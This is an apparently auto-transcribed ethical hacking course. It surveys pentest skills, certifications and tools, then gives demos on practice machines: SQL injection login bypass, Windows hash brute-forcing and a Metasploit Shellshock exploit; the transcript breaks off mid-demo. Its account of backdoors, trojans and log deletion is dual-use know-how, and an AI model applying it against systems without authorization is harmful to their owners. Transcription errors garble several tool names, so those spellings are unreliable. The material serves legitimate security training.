to master the mother of all programming languages which is the C programming language since Linux and a lot of backend code are written in C having a strong hand over this programming language is very important it’s always helpful to learn a couple more relevant languages like Python or JavaScript which will help you dissect giant pieces of server code like butter remaining anonymous is vital in the hacking sphere since giving a malicious actor news of your existence on a target network can cause him then to flee or attack your device instead the usage of MAC address randomizers and proxy chains is highly beneficial and recommended when monitoring networks for criminal activity and speaking of proxies ethical hackers must understand networking fundamentals and exactly how they are established learning about various networks and protocols might help you exploit flaws an ethical hacker with an extensive understanding of networking tools such as Wireshark Nap and others can overcome field incidents relatively unscathed the fifth skill in our list is traversing the dark web using the famous to browser most of the internet is hidden behind the tour networks and getting a closer look at the people who often are at the forefront of the hacking industry in the dark web directly can help you familiarize yourself with a certain domain secrets while keeping you updated with the latest happenings in the cyber crime world a major advantage that can tip the scales in the favor of an ethical hacker is the knowledge of cryptography or encryption encryption is used in various elements of information security including authentication data integrity anonymity and others passwords and other sensitive information are always encrypted on a network a hacker must understand how to recognize and break these encryption standards exploiting vulnerabilities make you a better ethical hacker simply keeps you aware of the security measures that are kept in place as industry standards while handing you the most advanced penetration testing tools on the market learning how to scan networks and systems for vulnerabilities that might result in a security breach ethical hackers may also attempt to write vulnerabilities to exploit the system in question as a final tip join forums for conversations with other hackers worldwide to trade share expertise and collaborate discord Reddit Telegram and other platforms all have communities where you can join and collaborate with fellow learners to broaden your learning spectrum now that we understand some basic skills ethical hackers need to excel in this domain let us look at the road map one can follow to get started many ethical hackers begin their careers by studying computer science you can also acquire an A+ certification from compia by appearing for and passing two additional tests these tests assess an individual’s understanding of PC components and their ability to disassemble and reassemble a PC however before advancing in your profession you must gather experience and obtain a network plus or a CCNA certification the Network Plus certification certifies fundamental network expertise such as network administration maintenance deployment and troubleshooting the CCNA certification guarantees the same skills and strives for foundation level proficiency once qualified you can advance to the next level of your career in network support you’ll be responsible for monitoring and upgrading installing security software and testing for vulnerabilities you’ll obtain expertise in network security and your goal should be offered as a position as a network engineer as a network engineer you will build and plan networks rather than simply maintain them your focus should now be on the security part of your journey to becoming an ethical hacker this is the time to focus on earning a security certifications such as security plus or CISSP the US Department of Defense has approved the security plus acquisition which covers testing on critical areas such as access control identity authentication and cryptography the CISSP certification is a worldwide recognized security acquisition that validates the expertise of risk management cloud technology and application development the next step would be to start working in the information security division an information security analyst studies systems and network security engages with security breaches and strives to implement security solutions for this profession you should focus on penetration testing to gain hands-on experience is some of the most essential tools of the trade getting the certified ethical hacker or the CE certification should be your top priority the training will teach you all you must understand to become a productive and ethical hacker you will be engaged in a hands-on environment where you will be guided through breaking into a network and finding any security flaws after obtaining this certification you can begin marketing yourself as a professional ethical hacker we have already covered some skills one needs to learn when starting their journey however an ethical hacker has certain roles and responsibilities that must be carried out meticulously the first of which is threat modeling threat modeling is optimizing network security by identifying vulnerabilities and determining counter measures for avoiding or reducing an attack’s impact on the system a threat is a real or projected negative incident jeopardizing the organization’s assets the role of an ethical hacker is to give a thorough assessment of potentially harmful assaults and their potential consequences they can also conduct information security audits or a risk based evaluation of a company’s security these regular exercises assess security readiness identify IT system weaknesses and offer strategies for reducing future attack threats they also assess how successfully security related policies are implemented resulting in a report that includes discovered flaws and appropriate solutions ethical writers must be able to collect data detect vulnerabilities and coordinate risks to create clear and unambiguous professional reports these evaluations are frequently used to justify finalizing security asset expenditures the market for trained ethical hackers has never been this expansive according to various surveys the job outlook for ethical hackers and information security analysts is supposed to grow by 33% between 2020 and 2030 companies like IBM Google and Microsoft are always on the lookout for trained cyber security personnel in this climate of data breaches and security vulnerabilities we hope this video has cleared some doubts regarding where to start and what to learn during this journey when it comes to web app hacking it generally refers to the exploitation of applications by HTTP which can be done by manipulating the applications via its graphical user interface this is done by tampering with the uniform resource identifier also known as a URI or tampering with the HTTP elements directly which are not a part of the URI the hacker can send a link via an email or a chat and may trick the users of a web application into executing actions in case the attack is on an administrator account the entire web application can be compromised anyone who uses a computer connected to the internet is susceptible to the threats that computer hackers and online predators pose these online villains typically use fishing scams spam email or instant messages and bogus websites to deliver dangerous malware to your computer and compromise your computer security computer hackers can also try to access your computer and private information directly if you’re not protected by a firewall they can monitor your conversations or peruse the back end of your personal website usually disguised with a bogus identity predators can lure you into revealing sensitive personal and financial information a web server which can be referred to as the hardware the computer or the software which helps to deliver content that can be accessed through the internet the primary function of a web server is to deliver these web pages on the request to clients using the hypertext transfer protocol or HTTP so hackers attack the web server to steal credential information passwords and business information by using different types of attacks like DOS attacks SYN flooding ping flood port scan and social engineering attacks in the area of web security despite strong encryption on the browser server channel web users still have no assurance about what happens at the other end although wireless networks offer great flexibility they have their own security problems a hacker can sniff the network packets without having to be in the same building where the network is located as wireless networks communicate through radio waves a hacker can easily sniff the network from a nearby location most attackers use network sniffing to find the SSID and hack a wireless network an attacker can attack a network from a distance and therefore it is sometimes difficult to collect evidence against the main hacker social engineering is the art of manipulating users of a computing system into revealing confidential information which can be later used to gain unauthorized access to a computer system the term can also include activities such as exploiting human kindness greed and curiosity to gain access to restricted access buildings or getting the users to installing backdoor software knowing the tricks used by hackers to trick users into releasing vital login information is fundamental in protecting computer systems coming to our main focus for today let us have a look at the top five most essential ethical hacking tools to be used in 2021 at the top of the chain lies N MAPAP nap which stands for network mapper is a free and open-source utility for network discovery and security auditing many systems and network administrators also find it useful for tasks such as network inventory managing service upgrade schedules and monitoring host or service uptime it is most beneficial in the early stages of ethical hacking where a hacker must figure the possible entry point to a system before running the necessary exploits thus allowing the hackers to leverage any insecure openings and thus breach the device lmap uses raw IB packets in novel ways to determine what hosts are available on the network what service they are running what operating systems are installed what type of packet filters and firewalls are in use and dozens other characteristics it was designed to rapidly scan large networks but works fines against single host as well since every application that connects to a network needs to do so via a port the wrong port or a server configuration can open a can of worms which lead to a thorough breach of the system and ultimately a fully hacked device next on our list we have Metasloit the Metasloit framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systematic vulnerabilities on both networks and servers because it’s an open-source framework it can be easily customized and used with most operating systems with Metasloit the ethical hacking team can use readymade or custom code and introduce it into a network to probe for weak spots as another flavor of threat hunting once the flaws are identified and documented the information can be used to address systemic weaknesses and prioritize solutions once a particular vulnerability is identified and the necessary exploit is fed into the system there are a host of options for the hacker depending on the vulnerability hackers can even run root commands from the terminal allowing complete control over the activities of the compromised system as well as all the personal data stored on the device a big advantage of metas-ploit is the ability to run full-fledged scans on the target system which gives a detailed picture of the security index of the system along with the necessary exploits that can be used to bypass the antivirus software having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers as denoted by its high rank in the list moving on we have the Aunetics framework akinetics is an end-to-end web security scanner which offers a 360deree view of an organization security it is an application security testing tool that helps the company address vulnerability across all their critical web assets the need to be able to test application in depth and further than traditional vulnerability management tools has created a market with several players in the application security space ainetics can detect over 7,000 vulnerabilities including SQL injections cross-sight scripting misconfigurations weak passwords exposed database and other outofband vulnerabilities it can scan all pages web apps and complex web applications running HTML 5 and JavaScript as well it also lets you scan complex multi-level forms and even password protected areas of the site iconetics is a dynamic application security testing package which has definite perks over status application security testing frameworks which are also known as SAS scanners sas tools only work during development and only for specific languages and have a history of reporting lot of false positives whereas dynamic testing tools also known as DAT have the ability to streamline testing from development to deployment with minimal issues next on our list we have Air Gaddaden this is a multi-use bash script used for Linux systems to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts along with being able to launch denial of service attacks on compromised networks this multi-purpose Wi-Fi hacking tool has very rich features which support multiple methods for Wi-Fi hacking including WPS hacking modes WP attacks handshake captures evil twin and so much more it usually needs an external network adapter that supports monitor mode which is necessary to be able to capture wireless traffic that reverse the air channels thanks to its open-source nature Air Garden can be used with multiple community plugins and add-ons thereby increasing its effectiveness against a wide variety of routers both in the 2.4 GHz and the 5 GHz band finally at number five we have John the Ripper john the Ripper is an open-source password security auditing and the password recovery tool which is available for many operating systems john the Ripper Jumbo supports hundred of hash and cipher types including for user passwords of operating systems web apps database servers encrypted keys and document files some of the key features of the tool include offering multiple modes to speed up the password cracking automatically deselecting the hashing algorithm used by the passwords and the ease of running and configurating the tool to make it password cracking easier it can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources the word list being used in these dictionary attacks can be used by the users and allowing for a completely customizable process we also have a few honorary mentions in our list that just missed the cut netsparker for instance is an automated yet fully configurable web application security scanner that enables you to scan websites web applications and web services the scanning technology is designed to help you secure web applications easily without any fuss so you can focus on fixing the reported vulnerabilities the Burp suit professional is one of the most popular penetration testing and vulnerability finder tools and is used for checking web application security the term Burp as it is commonly known is a proxy based tool which is used to evaluate the security of web- based application and to do hands-on testing moving away from websites and applications Wireshark is a free and open-source packet analyzer which was launched in 2006 it is used for network troubleshooting analysis software and communications protocol development and education it captures network traffic on the local network and stores data for offline analysis vshark captures network traffic from Ethernet Bluetooth wireless networks and frame relay connections now that we learn about the different types of tools that can be used when conducting an ethical hacking audit let’s learn about some potential benefits of such campaigns and why organizations prefer to pay for such audits being able to identify defects from an attacker’s perspective is game-changing since it displays all the potential avenues of a possible hack one can only prepare for the known vulnerabilities as a defensive specialist but proactively trying to breach a network or device can make hackers think of techniques that no defense contractors can account for this kind of unpredictability goes a long way in securing a network against malicious actors another advantage of hiring ethical hackers is the ability to preemptively fix possible weak points in a company’s network infrastructure as seen on many occasions a real breach will cause loss of data and irreparable damage to the foundation of an organization being able to gauge such shortcomings before they become public and can be used exploited is a benefit most organizations make use of this is not to imply that such security audits are only beneficial to the organization paying for it when coming across companies that provide certain services a reliable third party security audit goes a long way in instilling trust and confidence over their craft if the ethical hackers cannot find any major vulnerabilities that can be leveraged by hackers it just accentuates the technical brilliance of the organization and its engineers thereby increasing the clientele by a substantial amount in this we are going to discuss ethical hacking and penetration testing so we’re going to talk about the concepts about what constitutes an ethical hack and what is a penetration test we’re going to talk about the different types of penetration test and how they can be done we’re going to talk about an operating system called Kali Linux and we’re going to talk about its usage and its importance in cyber security we will also be discussing the different phases of penetration test and how people or hackers would utilize these phases uh to gain their objectives we’ll also be discussing in what areas can we do a penetration test how to do those penetration tests we’ll be discussing a quite a few bit of penetration testing tools that are available in the Kali Linux space and then we’ll be looking at a couple of demos at the end of the session to understand how these tools in the operating system can be utilized for various hacks so let’s start it with what is ethical hacking now plainly defined ethical hacking is locating weaknesses or vulnerabilities of computers and information systems using the intent and actions of a malicious hacker the major difference is here that we are hired to discover those weaknesses in a legal and ethical manner that means first and foremost our intent should not be malicious we do not wish any harm to the organization and whatever we discover is reported back and not misused once we report back we would also be trying to help them out to mitigate or remove those weaknesses or vulnerabilities to enhance the company’s security posture so essentially we would have the same training or the same knowledge as that of a malicious hacker except that the intent is going to be different the intent is going to help the organization achieve security to protect themselves against malicious hackers and the second most important thing about ethical hacking is that we are authorized to do that activity i cannot in good faith hack somebody and then tell them you know what I just I just wanted to help you out and uh here are your vulnerabilities and uh this is the way you can prevent them i first need the authorization from the other party and only then can I perform a ethical hack so in this example hacker attacks an individual with malicious intent and makes misuse of whatever information they have gotten they steal the data they maybe fry the operating system hardware destroy it and thus uh they leave the victim without uh a device with authorization an ethical hacker can also attack the same individual minus the destruction of course and the intent is good so they’re willingly finding out the vulnerabilities and helping the victim plug them out so that they wouldn’t be a victim of a malicious attack now here the first thing is authorization from the victim and the second thing is the good intent where we do not misuse those vulnerabilities and we report them back to the victim or to the client and help them uh patch those vulnerabilities that’s the main difference between a white hat and a black hat so security experts are normally termed as white hat hackers malicious hackers are termed as black hats now the responsibilities of a ethical hacker are multiffold first and foremost you have to create scripts test for vulnerabilities first have to identify those in the first place so there’s a vulnerability assessment identifying those vulnerabilities and then you’re going to test them to see the validity and the complexity of those vulnerabilities so your one of your responsibilities would be to develop tools to increase security as well or to configure security in such a way that it would be difficult to breach performing risk assessment now what is a risk risk is a threat that is posed to an organization by a possibility of getting hacked so let’s say I as a ethical hacker run a vulnerability scanner on a particular client i identify 10 different vulnerabilities within those 10 vulnerabilities I do a risk assessment to identify which vulnerability is critical would have the most impact on the client and what would be the repercussions if those vulnerabilities actually get exploited so I’m trying to find out in risk assessment that if the client gets hacked with the vulnerabilities identified what is the loss they would be facing once they get hacked and the loss could not only be loss of data it could be financial losses it could be loss of reputation penalties they have to pay to the client for breaches or penalties that they may have to pay for pay the governments in case of breaches that happened that uh couldn’t be controlled another responsibility of the ethical hacker is to set up policies in such a way that it becomes difficult for hackers to get access to devices or to protected data and finally train the staff for network security so uh we got a lot of employees in an organization we need to train the staff of what is allowed and what is not allowed how to keep themselves secure so that they don’t get compromised thus becoming a vulnerability themselves to the organization the policies that we have talked about are administrative policies to govern the employees of the organization for example password policies most of the organizations will have a tough password policy where they say you have to create a password that meets a certain level of complexity before that can be accepted and till you create that password you’re not allowed to log in or you’re not allowed to register so let’s move on to understand what is penetration testing now for penetration testing there is a phase called vulnerability assessment that happens before this vulnerability assessment is nothing but running a scanning tool to identify a list of potential flaws or vulnerabilities within the organization once you have identified the list of those vulnerabilities you would then move on to penetration test this is the part of ethical hacking where it specifically focuses on penetration only of the information systems so you have identified that flaw maybe it could be a database with a SQL injection or it could be uh a buffer over overrun flaw or it could be a simple password cracking attempt your idea is to create those tools create those attacks and try to penetrate into those areas where security is weak uh the essence of penetration testing is to penetrate information systems using various attacks the attacks could be anything like a fishing attack a password cracking attack a denial of service attack or any other vulnerabilities that you have identified uh during the vulnerability scan so what is Kali Linux and why is it used kali Linux is an operating system oftenly used by hackers and ethical hackers both because of the tool sets that the operating system contains it is a operating system created by professionals with a lot of embedded tools it is a DVN based operating system with advanced penetration testing and security auditing features there are more than 600 plus odd tools on that operating system that can help you leverage any of the attacks man-in-the-middle attacks sniffing password cracking uh any of these attacks would be possible with all the tools available you just need to know how to utilize the operating system and its tools contains like I said a hundred of hundreds of tools that are used for various information security tasks like uh computer forensics re reverse engineering information finding even uh getting access to different machines and then uh creating viruses worms to anything that you will 600 plus tools in the Kali Linux operating system there are periodic updates that are given out to the operating system as well it is open source that means it is free to utilize you can even have the source code you can modify it if you want too there’s customizations available for all the tools you can download third party tools and install them if you want there’s a wide support for wireless uh network cards multiple languages are being supported at the time at the same time as well and you can create a lot of attacking uh scripts you can create attacking tools and you can write your own exploits as well on Kali Linux so this all all in all helps you create a very robust system where you can create your own attacks and then launch them against unsuspecting victims now that is illegal so as far ethical hacking is concerned once you have authorization you’re going to identify which tools to be utilized you’re going to get the appropriate permissions and only then are you going to attempt those attacks let’s talk about the phases of penetration testing now there are five different phases the first one is the reconnaissance phase also known as the information gathering phase this is the most important phase for any hacker this is where the hacker or the ethical hacker if you will will gather as much information about the targets victim or vice versa the vict the victim right so once you have that information you would then be able to identify what tool sets to include and how to attack the victim for example you want to find out the IP addresses the domains subdomains the network architecture that is being utilized you want to identify operating systems that are being utilized the network IP ranges that are being utilized and so on so forth you might want to identify employees within an organization for social engineering attacks in the future email addresses telephone numbers anything and everything that will help you validate and give you information about the target is something that you want to do in the reconnaissance phase at this point in time we are not going to question whether whatever information we are getting is useful or not only time will tell depending on the various attacks that we will be building up later on this becomes your baseline this becomes your database with all the information about the victim so that you can come back from later stages back to the reconnaissance phase to look at the information that you have gathered and then you can fine-tune your attacks once you have done that you’re going to uh then start the scanning phase based on the information that you have gathered you’re going to identify live machines within a network once you have identified the live machines you’ll scan them for open ports protocols and procedures any processes that are running and then we going going to identify vulnerabilities within these processes and within these open ports so in the scanning phase uh why do we need to find live machines because we want to find out the machines that have booted up have an operating system and are running on the network if an machine is not available on the network or is in a shutdown mode that machine cannot be hacked through a technical attack then it will be a physical attack where you physically go to the machine and then do whatever you want to do with it for a technical attack you will have to identify the machines that have booted up then you’re going to scan the open ports because that’s going to be our entry point and on the port would be a service that is running so you scan the service as well identify the version of the service and then do a vulnerability scan to identify if there are any vulnerabilities on those services that are running and then based on all of this information we are going to develop our attacks as we go on so once we have this we go on to the gaining access phase where we are going to attack and try to get access to our victim’s machines could be a social engineering attack based on the information gathering we have done in the technical assessment and scanning phase if we have identified a vulnerability we’re going to identify a relevant exploit and then use that exploit to try to gain access or we might just craft a trojan and try to uh execute that trojan on the victim’s machine to uh check if we can get access through that particular manner once we have the access could be even a simple password cracking attack which we have been able to accomplish and we have cracked the password of the person and now we have gained access to that person’s computer right but these attacks would be temporary for example we have cracked a password somebody changes the password every 30 days after that period our attack would be useless if a Trojan is executed we get a connection to that machine for once but then how do we get get a repeated connection over and over again if we want to reconnect to that machine so that’s where we come into the maintaining access phase where we install uh rootkits key loggers sniffers and things like that where we could get a backdoor entry to the victim’s machine if we have already been successfully installed a Trojan we would want to add the Trojan to the startup menu so that every time the operating system starts the Trojan gets automatically executed and thus we maintain the backdoor entry to that victim’s machine once we have done all of this all these activities are going to leave a trace in the victim’s machine so if you install a Trojan a Trojan being an application would create directories and files a virus would be destructive in nature if you’re executing a script it will leave some logs behind if we even log in through the cracked password that we have it will create a login entry at for that particular time stamp along with the IP address that we utilized in the covering tracks we are essentially trying to avoid detection by deleting traces of our activity that means that we need to identify where logs have been stored we need to address those logs and we need to delete them or modify them in such a way that our activity is not traceable so these are the five main phases of a penetration test gather as much information as you can scan for machines ports protocols and services running on the victim’s device try to gain access by password cracking trojans exploits for the vulnerabilities if any maintain that access by installing further software which will allow you to gain backdoor access to that particular system and then try to cover your tracks by deleting all traces of your activity once successful the victim will have no idea and you have a back door entry and you can monitor the victim to the extent that you want now in an ethical hacker’s perspective this penetration test can be done in multiple aspects so again understand the fact that we are doing an authorized activity we have identified the tools that we have to use identified the attacks we have got the appropriate authorization and based on that authorization we are conducting a penetration test the penetration test may be asked to be done in one of these manners first is the blackbox test the blackbox test is where no information is given to the ethical hacker about the IT infrastructure so they have no idea what it is they start right from the first phase of the information gathering gather as much information they can and based on the gathered information they try to create and launch attacks to see if they are going to be successful now not only does it test the knowledge of the penetration tester it would also test the security implementations that the organization has done to see whether they can identify the attack and prevent it in the first place so this is the simulation of a malicious hacker scenario where a malicious hacker having no idea about the organization first tries to gather information and then tries to attack that organization so no source code knowledge no technological knowledge nothing they’re just going to try to gather information scan those devices and then try to gain access the second test is a gray box test where some information is given or some knowledge of the IT infrastructure is given think of it from a employees perspective a regular employee in an organization who doesn’t have extra privileges like an administrator but is just a regular employee does that means that they got limited access within the organization based on which they get some knowledge of the IT infrastructure so this is an attempt of an insider uh simulation attack where a regular user may want to try to misuse the access that they’ve been given and then try to gather information or try to gain access to other devices which they are not authorized to the third test is white box where is full knowledge of the IT infrastructure that has been given so this is again a simulation of an insider attack a malicious insider if you will but at this point in time the person has complete knowledge of the infrastructure could be in an administrative position and then they are trying to leverage their access to see if they can get information or they can compromise any stuff any of the data so the three attacks would be the first one black box where we are simulating a external threat a hacker sitting outside the organization trying to gain access the gray box is an insider threat where there’s a regular employee who is trying to get access to infrastructure that they are not authorized for and then the third audit is a white box audit where there’s an administrator who has all the leverage all the access and the visibility within the uh infrastructure and then they are trying to misuse their access to see what else they can get from whatever access has been authorized to them now let’s look at the areas of penetration testing where all could we do a penetration test thus compromising the security of the application or of the server or of the user so first and foremost network services it finds vulnerabilities and weaknesses in the security of the network infrastructure so for example we have switches routers firewalls in the network all of these are devices that need a configuration if they have been not correctly configured or if they have not been correctly secured they would leave some vulnerabilities behind if we as ethical hackers are able to identify these flaws these misconfigurations these vulnerabilities we could then try to exploit them and try to gain access to the network and devices within that network by uh getting access to the network in the first place then we have the web applications web applications are nothing but softwares that are developed over or deployed over a web server and are made available over the internet or the internet for example uh websites that we visit or web applications like Facebook if you will right so if these applications have vulnerabilities within them we then try to attack the web- based applications and thus try to bypass authentication or get access to database or try to leak information through those applications if not then we try to attack the client side now web application is at the server level and is hosted by the deployer so that’s at the server side the client side is where we as users are using a computer with a browser and trying to interact with the web application now the browser and the operating system that we are utilizing would have its own vulnerabilities thus identifying a client side vulnerability and then exploiting it to either either hack the client or then piggyback on the client’s connection and try to get access to the server so either you could attack the network the web application or the client side itself or you could attack wireless networks this test would examine all the wireless devices which are used in a corporation most of the wireless would have laptops smartphones tablets fabts all of those connected to them if you’re able to access any of these devices through the wireless it would help you gain access to other devices on the wireless as well and then social engineering so this is where you’re trying to attack humans you’re tricking an employee of a corporation to reveal some confidential information knowingly or unknowingly by tricking them with uh fake mails or fake websites or malicious emails that you have sent to them uh which they have failed to recognize as malicious and they click on it thus getting victimized social engineering attacks are always uh successful because of the gullibility of humans empathy sympathy humans basically have emotions emotions can be toyed with and then taken advantage of if the person is not careful enough for example the most common social engineering attack that we see is the Nigerian fraud where we receive an email that someone somewhere has died and has left a huge estate behind a few hundred million and we have been identified as the person through whom they want to transfer the money to a foreign land to save on taxes what are the chances of that happening on a daily basis right how many princes are there so that’s something that we do not verify it’s just the I guess the greed if you will of striking it rich quickly that makes us believe these kind of emails uh we have also received emails of lottery tickets that we have won over a period of time without even having bought a lottery ticket so if you haven’t bought one what did you win but we don’t ask these questions we just get excited about the amount of money that we have won and then we try to bet on our luck and try to see if that uh email is going to fruify or is it just another scam so social engineering attacks are dime a dozen these days and we need to be very careful on what we trust on the internet let’s look at the penetration testing tools there are hundreds and thousands of tools out there most of these have been conseded and collected together and hosted on a operating system known as Kali Linux that we have talked about earlier now the predecessor to Kali Linux was backtrack backtrack is no longer continued it has been discontinued and Kali Linux has taken uh the place of backtrack within which are all the tools that you see on your screen metasloit is one of the most favorite penetration testing tools of hackers and ethical hackers uh there are a lot of inbuilt exploits over there and we’ll be doing a demo at the end of the session on this n MAPAP is the information gathering tool which will scan for live devices scan for open ports protocols and services beef would be an application testing tool that would help us uh find exploits within applications nessus vulnerability scanner is a network and a hostbased scanner that would help you identify vulnerabilities within such hosts wireshark is a network sniffer which allows you to capture network packets and and analyze them to see if there are there is any information worth capturing within those packets sql map is a automated tool used for SQL injection attacks so you don’t even have to craft your queries for SQL injection it will be done by the SQL map tool you just need to identify whatever is possible through the queries that this SQL is going to create and then based on the activity that you’ve identified you just need to redefine your search parameters to get access to the database we’ll be doing a demo on SQL map or SQL map as well and then there is John the Ripper john the Ripper is a tool that is used for password cracking so dictionary attacks brute force attacks are done using John the Ripper what is a dictionary attack a dictionary attack is an attack where we create list of all probable passwords store them in a txt file and run that list against the password tool to see if any of those passwords are going to match a brute force attack is trying the same attack but with every permutation and combination of the alphabet that we have and we’re going to try to figure out uh if we are able to crack the password at all so these are just some of the tools for every tool there are another supporting 100 tools or more than that uh like for NSS vulnerability scanner you’ll have college vulnerability scanner you have uh GFI LAN card and there are other lots of other softwares out there but these are some of the most commonly utilized tools let’s look at the metas-ploit attack metas-ploit is a framework of penetration testing that makes hacking very simple you just need to know how to utilize the tool you need to identify the vulnerability associated with a particular exploit and then run the exploit on metasloit we’ll be demoing this during the practical so there are active exploits and passive exploits in active exploit exploits a specific computer runs until execution and then exits uses brute force and exits when an error occurs in a passive exploit these exploits wait for incoming requests and exploit them as soon as they connect they can also be used in conjunction with emails and web browsers so in passive exploits we create a payload we uh like a reverse connection payload we send it to the victim once the victim installs that software the machine will then initiate a connection to us our machine will be in a listen mode and then we will once that software is executed at their end we would then try to connect and exploit that particular vulnerability this is the uh practical that we’ll be doing on metasloit so let’s move on with the demos and then we’ll see uh what we can discuss amongst them all right let’s have a look at some of the demos that we had uh talked about in the ethical hacking and penetration testing module we are going to look at three different demos the first one is going to be a SQL injection attack that we’re going to perform on this tool that we have the second one is a password cracking attack on Windows 7 and the third one is a meter reader based or a metastasoid based shell shock attack on a Linux based web server so let’s get cracking i’ve powered on this virtual machine uh which is the OAS broken web application it is a tool that is provided for people who want to enhance their skills and they can practice uh how to do these attacks in a legal manner so we are going to go to this site i’m just going to open up my browser the IP address is 71.132 and that’s the OAS broken web application that we want to utilize we’re going to head off to mutility 2 and we are going to look at a SQL injection attack where we want to bypass authentication now this takes us to the login screen so we can just try our luck here and see that the authentication mechanism works the account does not exist so the username and password that we have supplied is not the correct one so we want to ensure that there’s a SQL database and uh we can uh try to attack it and see uh if we can bypass the authentication now uh what we want to do is we want to create a SQL based malformed query that can give us a different output so I’m just going to type in a single quote over here and type login and you can see that this is now suddenly recognized as a operator and there’s an error that is given out compared to the login that we tried uh earlier when we used a proper textbased login mechanism it gave us the account does not exist but here the single code gave us a error and it shows us how SQL works this is the query that we had created now in the trainings that you have for ethical hacking there would be explanations of what these queries are all about how the syntax works here we just going to see if we can create a mal for query to log in as a user in this case so what I’m going to do is uh create the query over here and we’re going to give it a comparison so we’re going to give it a or 1= 1 spacey space and if you now click login you should be able to bypass authentication and you can see user has been authenticated and we now have admin access to this application now here the SQL queries need to be crafted in such a perspective that they’re going to work so there would be a lot of exercise in identifying what the database is there’s a Microsoft database an Oracle database and so on so forth and then you have to choose those proper commands but identifying that would come in the training right now we’re just looking at de at a demo this is how a SQL injection attack works now let me log out here similarly now we are in a login page the same query work wonders where it allowed us to bypass authentication so it also depends on what kind of a page I am and what query would be accepted at this point in time so here application understanding would also come into the picture where uh which function we are calling upon when we are connected to a particular page now this is a user lookup function right so again here we try the same method test that’s not going to work authentication error bad user on password and if we type in the same query over here single quote or and give it a condition single quote or 1= 1 space now here it is not going to log us in because this is not a login page this is a user lookup form so here it would instead give us a dump of all the databases that it has so you can see all the usernames and passwords coming in that are stored in the user lookup field so this is where the understanding comes in of which query to create at what page where depending upon the function that is being called right so that’s the SQL uh injection attack that we wanted to look at let’s move on to password tracking now this is a Windows 7 machine that we have i’m just going to do a very basic password tracking example we’re just going to log in now here the assumption is that we are able to log in we have access to a computer and we want to check out other users who are using this computer and see if we can find out their passwords so that uh we can log in as a different user steal data if required and we wouldn’t be to blame if there are any logs that are created so here we’ve got a tool called Kane enable that is installed right here now I’m already an administrator on this machine i’m checking out other administrators who share the same privileges or any other user who may be on this system whose password I can crack and thus I would be able to get access through their account and then do any malicious activity right so this allows me to go into a cracker tool and it allows me to enumerate this machine and identify all the users and passwords that are there in this particular machine right so I’m just going to click on the plus sign and I’m going to import uh hashes from a local system so where are these files stored where does Windows store its passwords in what format are they stored and what this tool does to retrieve those that’s something that we all need to know as a ethical hacker right so import the hashes from the local system click on next it’s going to enumerate that file and it is going to give you a list of all the users that are there so you can see the users or hacker admin test the one that we are logged in as and then there’s a user called virus as well and you can see that this is the hash value of the password that is being utilized now there’s a particular format uh for a hash value for Windows and how it stores but once we have these hash values let’s say if I want to crack this password there are various attacks that we can do for example a dictionary based attack or a brute force attack let’s try a brute force attack right nlm is the hashing mechanism that is used by Windows so we’re going to try to create an NTLM hash attack and here we’re going to use a predetermined rule set for example we are not sure what characters are being utilized over here so we just create an attack like this using all characters and uh lowerase A through Z uppercase A through Z numeric 0 through 9 and all the special characters let’s say the password is between 7 and 16 characters and this is the character set that we want to try the brute force attack on what is a brute force attack it is an attack where the computer is going to try each and every permutation and combination out of this character set and try to figure out if the password is going to be correct so if we click start it’s going to start with a particular characters and then it is going to identify if that NLM hash is going to work against this character and you can see the time is going to be phenomenal over here so it’s not necessary that this attack would be viable it will be 100% successful given the time frame however the time frame is huge enough for this attack to become a little bit redundant there are other attacks that we can do which can easily identify this data for us as well but that is something that we will look on in future videos so that’s how we can get access to users and passwords uh there are different mechanisms where let’s say we don’t have login access then what are we going to do how we can create a fake user login or how we can remotely access a machine and then try to get the same access and that is what we are going to try to do in the next demo on a Linux machine so what we are doing in a Linux machine could also be doable on the Windows machine with a different exploit so what I’m going to do is this is the Linux web server that I have that I’m going to power on i’m going to use a Kali Linux machine to hack that device and I’m going to just power off my Windows 7 machine give it a minute till it boots up now this is also a demo machine that we have which has its own preconfigured vulnerabilities so here we’ve got something from the pentesters lab uh and has a shell shock vulnerability implemented inside shell shock vulnerability uh affects Linux Mac and Unix based operating systems for a particular version of the bash shell bash is the bone again shell which is the command line interface in these operating systems so what we are trying to do here is we are going to use the Kali Linux machine try to find out the vulnerability over here and if it exists we are going to use metasloit to attack this machine now the first and foremost thing is we want to identify the IP address we have no idea what the IP address is we are in the same subnet so we are assuming that we’re able to connect to this machine so what I’m going to do is I’m going to open up a tool called Zen Map i’m going to open up a command line interface find out what my IP address is and my IP address is this with a subnet mask of 255255255.0 so I want to see if there are any other machines that are live in the same subnet and we are doing a ping sweep over here to identify which machines are live in a minute we’ll get all the IP addresses 71.1 2 133 254 and 128 we know that we are 128 at this point in time uh 254 is the DHCP server so we assuming that 133 is the machine that we want to look at and let’s then try to see if we can scan that machine 133 and we’re going to do an intent scan to find out which ports are open what services are running over there and if it is whether the pentest machine that we were looking for you can see of the start port 22 and port 80 and somewhere here it’s going to give us the ports that are open and the details about those ports and somewhere here it will tell us that this is the pentester lab machine that we wanted which is correct so now we want to do a vulnerability analysis on this what we are going to do is I’m going to use another GUI based tool called Sparta which I can just find out from here sparta uses two tools in the background end mapap tool and a tool called nikto so we’re just going to start scanning 1926 16871.133 was the IP address add to scope and over a period of time you can see all of these will start populating with information there we are that’s the Nikto tool coming in scanning on port 80 which is uh which means that it’s a web server using HTTP it tells us it’s an Apache HTT HTTPD2.2.21 and gives us the 22 port number as well if we head over to the tab of Nikto or let’s look at the screenshot first this is what the website would be looking like and Nikto gives us the options over here it tells us that there is a vulnerability over here for shell shock and this is the path where the vulnerability is going to exist so what we going to do we go back to the command line sorry we open up a new one minimize all these other windows and we’re going to open up Metasloit metasloit is a penetration testing tool that is used by most hackers and ethical hackers to test applications and test uh existing exploits and vulnerabilities so just give it a minute till it starts you can see there are already around 1,700 exploits right here uh we’re going to see all those exploits with these commands there we are sorry for the typo and it will just give us a list of all the exploits that are stored in metasloit in this version so all of these are Windows based if we scroll up we will be looking at other vulnerabilities as well or exploits the unique specs exploits Linax OSX multi exploits and we’re looking for a exploit for um multi-based Apache or HTTP let’s go up uh let’s look at So this is the one that we’re looking for apache mod CGI bash environmental executable so what we’re going to do is we’re just going to copy it go back to the bottom say use exploit and paste the one that we wanted press enter say show options so it’ll ask us to configure this i’m just going to configure it based on the knowledge that we have set our host which 